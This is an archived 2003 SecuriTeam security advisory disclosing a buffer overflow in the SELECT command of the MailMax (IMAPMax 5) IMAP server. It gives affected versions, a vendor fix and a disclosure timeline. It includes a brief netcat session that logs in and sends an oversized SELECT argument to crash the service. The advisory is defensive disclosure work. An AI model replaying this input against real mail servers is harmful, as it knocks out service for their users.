[NT] Buffer Overflow Vulnerability found in MailMax (SELECT)

• Previous message: SecuriTeam: "[UNIX] Algorithmic Complexity Attacks and the Linux Networking Code"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 18 May 2003 11:11:00 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Buffer Overflow Vulnerability found in MailMax (SELECT)
------------------------------------------------------------------------

SUMMARY

 <http://www.smartmax.com/> MailMax is "a scalable e-mail server that
supports SMTP, IMAP4, and POP3 protocols". There is a buffer overflow
vulnerability in the IMAP4 protocol, within the IMAP4rev1 SmartMax IMAPMax
5, exploiting the vulnerability will cause the service to stop responding.

DETAILS

Vulnerable systems:
 * IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)

Immune systems:
 * IMAP4rev1 SmartMax IMAPMax 5.5

When a malicious attacker sends a large amount into the SELECT command.
The buffer will overflow.

Example:
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"

Vendor response:
The vendor has issued a fix (version 5.5) released by May 10th.

Timeline:
11/04/2003 Received an email from Mark Litchfield
15/04/2003 Made an analysis and found the vulnerability
28/04/2003 Reported the vulnerability to Vendor (support-at-smartmax.com)
02/05/2003 Received response from Vendor
17/05/2003 Public Disclosure.

ADDITIONAL INFORMATION

The vulnerability was discovered and reported by <mailto:Matrix at
0x36.org> .

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Algorithmic Complexity Attacks and the Linux Networking Code"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]